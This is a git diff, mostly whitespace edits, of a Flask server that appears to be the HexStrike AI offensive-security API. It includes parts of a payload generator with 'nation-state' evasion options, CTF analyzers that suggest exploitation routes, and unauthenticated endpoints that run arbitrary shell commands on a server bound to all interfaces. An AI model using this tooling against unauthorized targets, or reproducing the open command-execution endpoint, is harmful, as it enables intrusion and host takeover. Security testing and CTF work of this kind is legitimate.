evasion_level == "nation-state": # Nation-state level techniques advanced_techniques = [ @@ -14171,7 +14181,7 @@ def advanced_payload_generation(): } ] enhanced_payload["evasion_techniques"].extend(advanced_techniques) - + # Deployment methods enhanced_payload["deployment_methods"] = [ "Direct injection", @@ -14180,9 +14190,9 @@ def advanced_payload_generation(): "Cookie manipulation", "Fragment-based delivery" ] - + advanced_payloads.append(enhanced_payload) - + # Generate deployment instructions deployment_guide = { "pre_deployment": [ @@ -14204,7 +14214,7 @@ def advanced_payload_generation(): "Report vulnerabilities responsibly" ] } - + result = { "success": True, "advanced_payload_generation": { @@ -14219,10 +14229,10 @@ def advanced_payload_generation(): "disclaimer": "These payloads are for authorized security testing only. 
Ensure proper authorization before use.", "timestamp": datetime.now().isoformat() } - + logger.info(f"๐ŸŽฏ Advanced payload generation completed | Generated: {len(advanced_payloads)} payloads") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in advanced payload generation: {str(e)}") return jsonify({ @@ -14245,10 +14255,10 @@ def create_ctf_challenge_workflow(): points = params.get("points", 100) description = params.get("description", "") target = params.get("target", "") - + if not challenge_name: return jsonify({"error": "Challenge name is required"}), 400 - + # Create CTF challenge object challenge = CTFChallenge( name=challenge_name, @@ -14258,10 +14268,10 @@ def create_ctf_challenge_workflow(): description=description, target=target ) - + # Generate workflow workflow = ctf_manager.create_ctf_challenge_workflow(challenge) - + logger.info(f"๐ŸŽฏ CTF workflow created for {challenge_name} | Category: {category} | Difficulty: {difficulty}") return jsonify({ "success": True, @@ -14269,7 +14279,7 @@ def create_ctf_challenge_workflow(): "challenge": challenge.to_dict(), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating CTF workflow: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14285,10 +14295,10 @@ def auto_solve_ctf_challenge(): points = params.get("points", 100) description = params.get("description", "") target = params.get("target", "") - + if not challenge_name: return jsonify({"error": "Challenge name is required"}), 400 - + # Create CTF challenge object challenge = CTFChallenge( name=challenge_name, @@ -14298,10 +14308,10 @@ def auto_solve_ctf_challenge(): description=description, target=target ) - + # Attempt automated solving result = ctf_automator.auto_solve_challenge(challenge) - + logger.info(f"๐Ÿค– CTF auto-solve attempted for {challenge_name} | Status: {result['status']}") return jsonify({ "success": True, @@ -14309,7 +14319,7 @@ def auto_solve_ctf_challenge(): "challenge": challenge.to_dict(), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in CTF auto-solve: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14321,10 +14331,10 @@ def create_ctf_team_strategy(): params = request.json challenges_data = params.get("challenges", []) team_skills = params.get("team_skills", {}) - + if not challenges_data: return jsonify({"error": "Challenges data is required"}), 400 - + # Convert challenge data to CTFChallenge objects challenges = [] for challenge_data in challenges_data: @@ -14337,10 +14347,10 @@ def create_ctf_team_strategy(): target=challenge_data.get("target", "") ) challenges.append(challenge) - + # Generate team strategy strategy = ctf_coordinator.optimize_team_strategy(challenges, team_skills) - + logger.info(f"๐Ÿ‘ฅ CTF team strategy created | Challenges: {len(challenges)} | Team members: {len(team_skills)}") return jsonify({ "success": True, @@ -14349,7 +14359,7 @@ def create_ctf_team_strategy(): "team_size": len(team_skills), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating CTF team strategy: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14361,14 +14371,14 @@ def suggest_ctf_tools(): params = request.json description = params.get("description", "") category = params.get("category", "misc") - + if not description: return jsonify({"error": "Challenge description is required"}), 400 - + # Get tool suggestions 
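# Suggestions are driven by keywords in the challenge description plus the
# category; each suggested tool is then mapped to a command template
# containing the literal placeholder TARGET (falling back to "<tool> TARGET"
# when no template exists), presumably for the caller to substitute with the
# real host or file.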
suggested_tools = ctf_tools.suggest_tools_for_challenge(description, category) category_tools = ctf_tools.get_category_tools(f"{category}_recon") - + # Get tool commands tool_commands = {} for tool in suggested_tools: @@ -14376,7 +14386,7 @@ def suggest_ctf_tools(): tool_commands[tool] = ctf_tools.get_tool_command(tool, "TARGET") except: tool_commands[tool] = f"{tool} TARGET" - + logger.info(f"๐Ÿ”ง CTF tools suggested | Category: {category} | Tools: {len(suggested_tools)}") return jsonify({ "success": True, @@ -14386,7 +14396,7 @@ def suggest_ctf_tools(): "category": category, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error suggesting CTF tools: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14401,10 +14411,10 @@ def ctf_cryptography_solver(): key_hint = params.get("key_hint", "") known_plaintext = params.get("known_plaintext", "") additional_info = params.get("additional_info", "") - + if not cipher_text: return jsonify({"error": "Cipher text is required"}), 400 - + results = { "cipher_text": cipher_text, "cipher_type": cipher_type, @@ -14413,53 +14423,53 @@ def ctf_cryptography_solver(): "recommended_tools": [], "next_steps": [] } - + # Cipher type identification if cipher_type == "unknown": # Basic cipher identification heuristics if re.match(r'^[0-9a-fA-F]+$', cipher_text.replace(' ', '')): results["analysis_results"].append("Possible hexadecimal encoding") results["recommended_tools"].extend(["hex", "xxd"]) - + if re.match(r'^[A-Za-z0-9+/]+=*$', cipher_text.replace(' ', '')): results["analysis_results"].append("Possible Base64 encoding") results["recommended_tools"].append("base64") - + if len(set(cipher_text.upper().replace(' ', ''))) <= 26: results["analysis_results"].append("Possible substitution cipher") results["recommended_tools"].extend(["frequency-analysis", "substitution-solver"]) - + # Hash identification hash_patterns = { 32: "MD5", - 40: "SHA1", + 40: "SHA1", 64: "SHA256", 128: "SHA512" } - + clean_text = cipher_text.replace(' ', '').replace('\n', '') if len(clean_text) in hash_patterns and re.match(r'^[0-9a-fA-F]+$', clean_text): hash_type = hash_patterns[len(clean_text)] results["analysis_results"].append(f"Possible {hash_type} hash") results["recommended_tools"].extend(["hashcat", "john", "hash-identifier"]) - + # Frequency analysis for substitution ciphers if cipher_type in ["substitution", "caesar", "vigenere"] or "substitution" in results["analysis_results"]: char_freq = {} for char in cipher_text.upper(): if char.isalpha(): char_freq[char] = char_freq.get(char, 0) + 1 - + if char_freq: most_common = max(char_freq, key=char_freq.get) results["analysis_results"].append(f"Most frequent character: {most_common} ({char_freq[most_common]} occurrences)") results["next_steps"].append("Try substituting most frequent character with 'E'") - + # ROT/Caesar cipher detection if cipher_type == "caesar" or len(set(cipher_text.upper().replace(' ', ''))) <= 26: results["recommended_tools"].append("rot13") results["next_steps"].append("Try all ROT values (1-25)") - + # RSA-specific analysis if cipher_type == "rsa" or "rsa" in additional_info.lower(): results["recommended_tools"].extend(["rsatool", "factordb", "yafu"]) @@ -14468,7 +14478,7 @@ def ctf_cryptography_solver(): "Look for small public exponent attacks", "Check for common modulus attacks" ]) - + # Vigenรจre cipher analysis if cipher_type == "vigenere" or "vigenere" in additional_info.lower(): results["recommended_tools"].append("vigenere-solver") @@ 
-14477,14 +14487,14 @@ def ctf_cryptography_solver(): "Use index of coincidence analysis", "Try common key words" ]) - + logger.info(f"๐Ÿ” CTF crypto analysis completed | Type: {cipher_type} | Tools: {len(results['recommended_tools'])}") return jsonify({ "success": True, "analysis": results, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in CTF crypto solver: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14498,10 +14508,10 @@ def ctf_forensics_analyzer(): analysis_type = params.get("analysis_type", "comprehensive") extract_hidden = params.get("extract_hidden", True) check_steganography = params.get("check_steganography", True) - + if not file_path: return jsonify({"error": "File path is required"}), 400 - + results = { "file_path": file_path, "analysis_type": analysis_type, @@ -14512,14 +14522,14 @@ def ctf_forensics_analyzer(): "recommended_tools": [], "next_steps": [] } - + # Basic file analysis try: # File command file_result = subprocess.run(['file', file_path], capture_output=True, text=True, timeout=30) if file_result.returncode == 0: results["file_info"]["type"] = file_result.stdout.strip() - + # Determine file category and suggest tools file_type = file_result.stdout.lower() if "image" in file_type: @@ -14552,7 +14562,7 @@ def ctf_forensics_analyzer(): ]) except Exception as e: results["file_info"]["error"] = str(e) - + # Metadata extraction try: exif_result = subprocess.run(['exiftool', file_path], capture_output=True, text=True, timeout=30) @@ -14560,7 +14570,7 @@ def ctf_forensics_analyzer(): results["metadata"]["exif"] = exif_result.stdout except Exception as e: results["metadata"]["exif_error"] = str(e) - + # Binwalk analysis for hidden files if extract_hidden: try: @@ -14575,7 +14585,7 @@ def ctf_forensics_analyzer(): "tool": "binwalk", "error": str(e) }) - + # Steganography checks if check_steganography: # Check for common steganography tools @@ -14588,7 +14598,7 @@ def ctf_forensics_analyzer(): steg_result = subprocess.run([tool, '-a', file_path], capture_output=True, text=True, timeout=30) elif tool == "outguess": steg_result = subprocess.run([tool, '-r', file_path, '/tmp/outguess_output'], capture_output=True, text=True, timeout=30) - + if steg_result.returncode == 0 and steg_result.stdout.strip(): results["steganography_results"].append({ "tool": tool, @@ -14599,7 +14609,7 @@ def ctf_forensics_analyzer(): "tool": tool, "error": str(e) }) - + # Strings analysis try: strings_result = subprocess.run(['strings', file_path], capture_output=True, text=True, timeout=30) @@ -14609,7 +14619,7 @@ def ctf_forensics_analyzer(): for line in strings_result.stdout.split('\n'): if any(keyword in line.lower() for keyword in ['flag', 'password', 'key', 'secret', 'http', 'ftp']): interesting_strings.append(line.strip()) - + if interesting_strings: results["hidden_data"].append({ "tool": "strings", @@ -14620,14 +14630,14 @@ def ctf_forensics_analyzer(): "tool": "strings", "error": str(e) }) - + logger.info(f"๐Ÿ” CTF forensics analysis completed | File: {file_path} | Tools used: {len(results['recommended_tools'])}") return jsonify({ "success": True, "analysis": results, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in CTF forensics analyzer: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14641,10 +14651,10 @@ def ctf_binary_analyzer(): analysis_depth = params.get("analysis_depth", "comprehensive") # basic, comprehensive, deep 
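# Depth gates the heavier passes below: "basic" stops at the file, checksec
# and strings checks, while "comprehensive" and "deep" additionally run the
# ROP gadget search and the objdump function sweep.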
check_protections = params.get("check_protections", True) find_gadgets = params.get("find_gadgets", True) - + if not binary_path: return jsonify({"error": "Binary path is required"}), 400 - + results = { "binary_path": binary_path, "analysis_depth": analysis_depth, @@ -14656,13 +14666,13 @@ def ctf_binary_analyzer(): "recommended_tools": [], "exploitation_hints": [] } - + # Basic file information try: file_result = subprocess.run(['file', binary_path], capture_output=True, text=True, timeout=30) if file_result.returncode == 0: results["file_info"]["type"] = file_result.stdout.strip() - + # Determine architecture and suggest tools file_output = file_result.stdout.lower() if "x86-64" in file_output or "x86_64" in file_output: @@ -14671,18 +14681,18 @@ def ctf_binary_analyzer(): results["file_info"]["architecture"] = "i386" elif "arm" in file_output: results["file_info"]["architecture"] = "ARM" - + results["recommended_tools"].extend(["gdb-peda", "radare2", "ghidra"]) except Exception as e: results["file_info"]["error"] = str(e) - + # Security protections check if check_protections: try: checksec_result = subprocess.run(['checksec', '--file', binary_path], capture_output=True, text=True, timeout=30) if checksec_result.returncode == 0: results["security_protections"]["checksec"] = checksec_result.stdout - + # Parse protections and provide exploitation hints output = checksec_result.stdout.lower() if "no canary found" in output: @@ -14695,13 +14705,13 @@ def ctf_binary_analyzer(): results["exploitation_hints"].append("RELRO disabled - GOT overwrite attacks possible") except Exception as e: results["security_protections"]["error"] = str(e) - + # Strings analysis try: strings_result = subprocess.run(['strings', binary_path], capture_output=True, text=True, timeout=30) if strings_result.returncode == 0: strings_output = strings_result.stdout.split('\n') - + # Categorize interesting strings interesting_categories = { "functions": [], @@ -14710,48 +14720,48 @@ def ctf_binary_analyzer(): "potential_flags": [], "system_calls": [] } - + for string in strings_output: string = string.strip() if not string: continue - + # Look for function names if any(func in string for func in ['printf', 'scanf', 'gets', 'strcpy', 'system', 'execve']): interesting_categories["functions"].append(string) - + # Look for format strings if '%' in string and any(fmt in string for fmt in ['%s', '%d', '%x', '%n']): interesting_categories["format_strings"].append(string) - + # Look for file paths if string.startswith('/') or '\\' in string: interesting_categories["file_paths"].append(string) - + # Look for potential flags if any(keyword in string.lower() for keyword in ['flag', 'ctf', 'key', 'password']): interesting_categories["potential_flags"].append(string) - + # Look for system calls if string in ['sh', 'bash', '/bin/sh', '/bin/bash', 'cmd.exe']: interesting_categories["system_calls"].append(string) - + results["strings_analysis"] = interesting_categories - + # Add exploitation hints based on strings if interesting_categories["functions"]: dangerous_funcs = ['gets', 'strcpy', 'sprintf', 'scanf'] found_dangerous = [f for f in dangerous_funcs if any(f in s for s in interesting_categories["functions"])] if found_dangerous: results["exploitation_hints"].append(f"Dangerous functions found: {', '.join(found_dangerous)} - potential buffer overflow") - + if interesting_categories["format_strings"]: if any('%n' in s for s in interesting_categories["format_strings"]): results["exploitation_hints"].append("Format string with %n found 
- potential format string vulnerability") - + except Exception as e: results["strings_analysis"]["error"] = str(e) - + # ROP gadgets search if find_gadgets and analysis_depth in ["comprehensive", "deep"]: try: @@ -14759,20 +14769,20 @@ def ctf_binary_analyzer(): if ropgadget_result.returncode == 0: gadget_lines = ropgadget_result.stdout.split('\n') useful_gadgets = [] - + for line in gadget_lines: if 'pop' in line and 'ret' in line: useful_gadgets.append(line.strip()) - + results["gadgets"] = useful_gadgets[:20] # Limit to first 20 gadgets - + if useful_gadgets: results["exploitation_hints"].append(f"Found {len(useful_gadgets)} ROP gadgets - ROP chain exploitation possible") results["recommended_tools"].append("ropper") - + except Exception as e: results["gadgets"] = [f"Error finding gadgets: {str(e)}"] - + # Function analysis with objdump if analysis_depth in ["comprehensive", "deep"]: try: @@ -14785,25 +14795,25 @@ def ctf_binary_analyzer(): if len(parts) >= 6: func_name = parts[-1] functions.append(func_name) - + results["interesting_functions"] = functions[:50] # Limit to first 50 functions except Exception as e: results["interesting_functions"] = [f"Error analyzing functions: {str(e)}"] - + # Add tool recommendations based on findings if results["exploitation_hints"]: results["recommended_tools"].extend(["pwntools", "gdb-peda", "one-gadget"]) - + if "format string" in str(results["exploitation_hints"]).lower(): results["recommended_tools"].append("format-string-exploiter") - + logger.info(f"๐Ÿ”ฌ CTF binary analysis completed | Binary: {binary_path} | Hints: {len(results['exploitation_hints'])}") return jsonify({ "success": True, "analysis": results, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in CTF binary analyzer: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14819,13 +14829,13 @@ def execute_command_async(): params = request.json command = params.get("command", "") context = params.get("context", {}) - + if not command: return jsonify({"error": "Command parameter is required"}), 400 - + # Execute command asynchronously task_id = enhanced_process_manager.execute_command_async(command, context) - + logger.info(f"๐Ÿš€ Async command execution started | Task ID: {task_id}") return jsonify({ "success": True, @@ -14834,7 +14844,7 @@ def execute_command_async(): "status": "submitted", "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in async command execution: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14844,10 +14854,10 @@ def get_async_task_result(task_id): """Get result of asynchronous task""" try: result = enhanced_process_manager.get_task_result(task_id) - + if result["status"] == "not_found": return jsonify({"error": "Task not found"}), 404 - + logger.info(f"๐Ÿ“‹ Task result retrieved | Task ID: {task_id} | Status: {result['status']}") return jsonify({ "success": True, @@ -14855,7 +14865,7 @@ def get_async_task_result(task_id): "result": result, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error getting task result: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14865,14 +14875,14 @@ def get_process_pool_stats(): """Get process pool statistics and performance metrics""" try: stats = enhanced_process_manager.get_comprehensive_stats() - + logger.info(f"๐Ÿ“Š Process pool stats retrieved | Active workers: {stats['process_pool']['active_workers']}") return jsonify({ 
"success": True, "stats": stats, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error getting pool stats: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14882,14 +14892,14 @@ def get_cache_stats(): """Get advanced cache statistics""" try: cache_stats = enhanced_process_manager.cache.get_stats() - + logger.info(f"๐Ÿ’พ Cache stats retrieved | Hit rate: {cache_stats['hit_rate']:.1f}%") return jsonify({ "success": True, "cache_stats": cache_stats, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error getting cache stats: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14899,14 +14909,14 @@ def clear_process_cache(): """Clear the advanced cache""" try: enhanced_process_manager.cache.clear() - + logger.info("๐Ÿงน Process cache cleared") return jsonify({ "success": True, "message": "Cache cleared successfully", "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error clearing cache: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14917,7 +14927,7 @@ def get_resource_usage(): try: current_usage = enhanced_process_manager.resource_monitor.get_current_usage() usage_trends = enhanced_process_manager.resource_monitor.get_usage_trends() - + logger.info(f"๐Ÿ“ˆ Resource usage retrieved | CPU: {current_usage['cpu_percent']:.1f}% | Memory: {current_usage['memory_percent']:.1f}%") return jsonify({ "success": True, @@ -14925,7 +14935,7 @@ def get_resource_usage(): "usage_trends": usage_trends, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error getting resource usage: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14937,7 +14947,7 @@ def get_performance_dashboard(): dashboard_data = enhanced_process_manager.performance_dashboard.get_summary() pool_stats = enhanced_process_manager.process_pool.get_pool_stats() resource_usage = enhanced_process_manager.resource_monitor.get_current_usage() - + # Create comprehensive dashboard dashboard = { "performance_summary": dashboard_data, @@ -14951,14 +14961,14 @@ def get_performance_dashboard(): "disk_status": "healthy" if resource_usage["disk_percent"] < 90 else "warning" if resource_usage["disk_percent"] < 98 else "critical" } } - + logger.info(f"๐Ÿ“Š Performance dashboard retrieved | Success rate: {dashboard_data.get('success_rate', 0):.1f}%") return jsonify({ "success": True, "dashboard": dashboard, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error getting performance dashboard: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14969,9 +14979,9 @@ def terminate_process_gracefully(pid): try: params = request.json or {} timeout = params.get("timeout", 30) - + success = enhanced_process_manager.terminate_process_gracefully(pid, timeout) - + if success: logger.info(f"โœ… Process {pid} terminated gracefully") return jsonify({ @@ -14987,7 +14997,7 @@ def terminate_process_gracefully(pid): "pid": pid, "timestamp": datetime.now().isoformat() }), 400 - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error terminating process {pid}: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14999,13 +15009,13 @@ def configure_auto_scaling(): params = request.json enabled = params.get("enabled", True) thresholds = params.get("thresholds", {}) - + # Update auto-scaling configuration enhanced_process_manager.auto_scaling_enabled = 
enabled - + if thresholds: enhanced_process_manager.resource_thresholds.update(thresholds) - + logger.info(f"โš™๏ธ Auto-scaling configured | Enabled: {enabled}") return jsonify({ "success": True, @@ -15013,7 +15023,7 @@ def configure_auto_scaling(): "resource_thresholds": enhanced_process_manager.resource_thresholds, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error configuring auto-scaling: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -15025,13 +15035,13 @@ def manual_scale_pool(): params = request.json action = params.get("action", "") # "up" or "down" count = params.get("count", 1) - + if action not in ["up", "down"]: return jsonify({"error": "Action must be 'up' or 'down'"}), 400 - + current_stats = enhanced_process_manager.process_pool.get_pool_stats() current_workers = current_stats["active_workers"] - + if action == "up": max_workers = enhanced_process_manager.process_pool.max_workers if current_workers + count <= max_workers: @@ -15048,7 +15058,7 @@ def manual_scale_pool(): message = f"Scaled down by {count} workers" else: return jsonify({"error": f"Cannot scale down: would go below min workers ({min_workers})"}), 400 - + logger.info(f"๐Ÿ“ Manual scaling | {message} | Workers: {current_workers} โ†’ {new_workers}") return jsonify({ "success": True, @@ -15057,7 +15067,7 @@ def manual_scale_pool(): "current_workers": new_workers, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error scaling pool: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -15068,15 +15078,15 @@ def process_health_check(): try: # Get all system stats comprehensive_stats = enhanced_process_manager.get_comprehensive_stats() - + # Determine overall health resource_usage = comprehensive_stats["resource_usage"] pool_stats = comprehensive_stats["process_pool"] cache_stats = comprehensive_stats["cache"] - + health_score = 100 issues = [] - + # CPU health if resource_usage["cpu_percent"] > 95: health_score -= 30 @@ -15084,7 +15094,7 @@ def process_health_check(): elif resource_usage["cpu_percent"] > 80: health_score -= 15 issues.append("High CPU usage") - + # Memory health if resource_usage["memory_percent"] > 95: health_score -= 25 @@ -15092,7 +15102,7 @@ def process_health_check(): elif resource_usage["memory_percent"] > 85: health_score -= 10 issues.append("High memory usage") - + # Disk health if resource_usage["disk_percent"] > 98: health_score -= 20 @@ -15100,19 +15110,19 @@ def process_health_check(): elif resource_usage["disk_percent"] > 90: health_score -= 5 issues.append("High disk usage") - + # Process pool health if pool_stats["queue_size"] > 50: health_score -= 15 issues.append("High task queue backlog") - + # Cache health if cache_stats["hit_rate"] < 30: health_score -= 10 issues.append("Low cache hit rate") - + health_score = max(0, health_score) - + # Determine status if health_score >= 90: status = "excellent" @@ -15124,7 +15134,7 @@ def process_health_check(): status = "poor" else: status = "critical" - + health_report = { "overall_status": status, "health_score": health_score, @@ -15132,7 +15142,7 @@ def process_health_check(): "system_stats": comprehensive_stats, "recommendations": [] } - + # Add recommendations based on issues if "High CPU usage" in issues: health_report["recommendations"].append("Consider reducing concurrent processes or upgrading CPU") @@ -15142,14 +15152,14 @@ def process_health_check(): health_report["recommendations"].append("Scale up 
process pool or optimize task processing") if "Low cache hit rate" in issues: health_report["recommendations"].append("Review cache TTL settings or increase cache size") - + logger.info(f"๐Ÿฅ Health check completed | Status: {status} | Score: {health_score}/100") return jsonify({ "success": True, "health_report": health_report, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in health check: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -15184,7 +15194,7 @@ def test_error_recovery(): tool_name = data.get("tool_name", "nmap") error_type = data.get("error_type", "timeout") target = data.get("target", "example.com") - + # Simulate an error for testing if error_type == "timeout": exception = TimeoutError("Simulated timeout error") @@ -15194,16 +15204,16 @@ def test_error_recovery(): exception = ConnectionError("Simulated network error") else: exception = Exception(f"Simulated {error_type} error") - + context = { "target": target, "parameters": data.get("parameters", {}), "attempt_count": 1 } - + # Get recovery strategy recovery_strategy = error_handler.handle_tool_failure(tool_name, exception, context) - + return jsonify({ "success": True, "recovery_strategy": { @@ -15217,7 +15227,7 @@ def test_error_recovery(): "alternative_tools": error_handler.tool_alternatives.get(tool_name, []), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"Error testing recovery system: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -15228,7 +15238,7 @@ def get_fallback_chains(): try: operation = request.args.get("operation", "") failed_tools = request.args.getlist("failed_tools") - + if operation: fallback_chain = degradation_manager.create_fallback_chain(operation, failed_tools) return jsonify({ @@ -15245,7 +15255,7 @@ def get_fallback_chains(): "critical_operations": list(degradation_manager.critical_operations), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"Error getting fallback chains: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -15260,10 +15270,10 @@ def execute_with_recovery_endpoint(): parameters = data.get("parameters", {}) max_attempts = data.get("max_attempts", 3) use_cache = data.get("use_cache", True) - + if not tool_name or not command: return jsonify({"error": "tool_name and command are required"}), 400 - + # Execute command with recovery result = execute_command_with_recovery( tool_name=tool_name, @@ -15272,13 +15282,13 @@ def execute_with_recovery_endpoint(): use_cache=use_cache, max_attempts=max_attempts ) - + return jsonify({ "success": result.get("success", False), "result": result, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"Error executing command with recovery: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -15289,13 +15299,13 @@ def classify_error_endpoint(): try: data = request.get_json() error_message = data.get("error_message", "") - + if not error_message: return jsonify({"error": "error_message is required"}), 400 - + error_type = error_handler.classify_error(error_message) recovery_strategies = error_handler.recovery_strategies.get(error_type, []) - + return jsonify({ "success": True, "error_type": error_type.value, @@ -15310,7 +15320,7 @@ def classify_error_endpoint(): ], "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"Error classifying error: {str(e)}") return jsonify({"error": 
f"Server error: {str(e)}"}), 500 @@ -15323,18 +15333,18 @@ def get_parameter_adjustments(): tool_name = data.get("tool_name", "") error_type_str = data.get("error_type", "") original_params = data.get("original_params", {}) - + if not tool_name or not error_type_str: return jsonify({"error": "tool_name and error_type are required"}), 400 - + # Convert string to ErrorType enum try: error_type = ErrorType(error_type_str) except ValueError: return jsonify({"error": f"Invalid error_type: {error_type_str}"}), 400 - + adjusted_params = error_handler.auto_adjust_parameters(tool_name, error_type, original_params) - + return jsonify({ "success": True, "tool_name": tool_name, @@ -15343,7 +15353,7 @@ def get_parameter_adjustments(): "adjusted_params": adjusted_params, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"Error getting parameter adjustments: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -15353,12 +15363,12 @@ def get_alternative_tools(): """Get alternative tools for a given tool""" try: tool_name = request.args.get("tool_name", "") - + if not tool_name: return jsonify({"error": "tool_name parameter is required"}), 400 - + alternatives = error_handler.tool_alternatives.get(tool_name, []) - + return jsonify({ "success": True, "tool_name": tool_name, @@ -15366,7 +15376,7 @@ def get_alternative_tools(): "has_alternatives": len(alternatives) > 0, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"Error getting alternative tools: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -15377,19 +15387,19 @@ BANNER = ModernVisualEngine.create_banner() if __name__ == "__main__": # Display the beautiful new banner print(BANNER) - + parser = argparse.ArgumentParser(description="Run the HexStrike AI API Server") parser.add_argument("--debug", action="store_true", help="Enable debug mode") parser.add_argument("--port", type=int, default=API_PORT, help=f"Port for the API server (default: {API_PORT})") args = parser.parse_args() - + if args.debug: DEBUG_MODE = True logger.setLevel(logging.DEBUG) - + if args.port != API_PORT: API_PORT = args.port - + # Enhanced startup messages with beautiful formatting startup_info = f""" {ModernVisualEngine.COLORS['MATRIX_GREEN']}{ModernVisualEngine.COLORS['BOLD']}โ•ญโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฎ{ModernVisualEngine.COLORS['RESET']} @@ -15402,9 +15412,9 @@ if __name__ == "__main__": {ModernVisualEngine.COLORS['BOLD']}โ”‚{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['MATRIX_GREEN']}โœจ Enhanced Visual Engine:{ModernVisualEngine.COLORS['RESET']} Active {ModernVisualEngine.COLORS['MATRIX_GREEN']}{ModernVisualEngine.COLORS['BOLD']}โ•ฐโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฏ{ModernVisualEngine.COLORS['RESET']} """ - + for line in startup_info.strip().split('\n'): if line.strip(): logger.info(line) - - app.run(host="0.0.0.0", port=API_PORT, debug=DEBUG_MODE) \ No newline at end of file + + app.run(host="0.0.0.0", port=API_PORT, debug=DEBUG_MODE) diff --git a/requirements.txt b/requirements.txt index 2a2155f..ff4cede 100644 --- a/requirements.txt +++ 
diff --git a/requirements.txt b/requirements.txt
index 2a2155f..ff4cede 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,4 +1,4 @@
-# HexStrike AI MCP Agents v6.0 
+# HexStrike AI MCP Agents v6.0
 #
 # INSTALLATION COMMANDS:
 # python3 -m venv hexstrike_env
@@ -36,48 +36,49 @@ mitmproxy>=9.0.0,<11.0.0          # HTTP proxy (mitmproxy imports)
 # ============================================================================
 pwntools>=4.10.0,<5.0.0           # Binary exploitation (from pwn import *)
 angr>=9.2.0,<10.0.0               # Binary analysis (import angr)
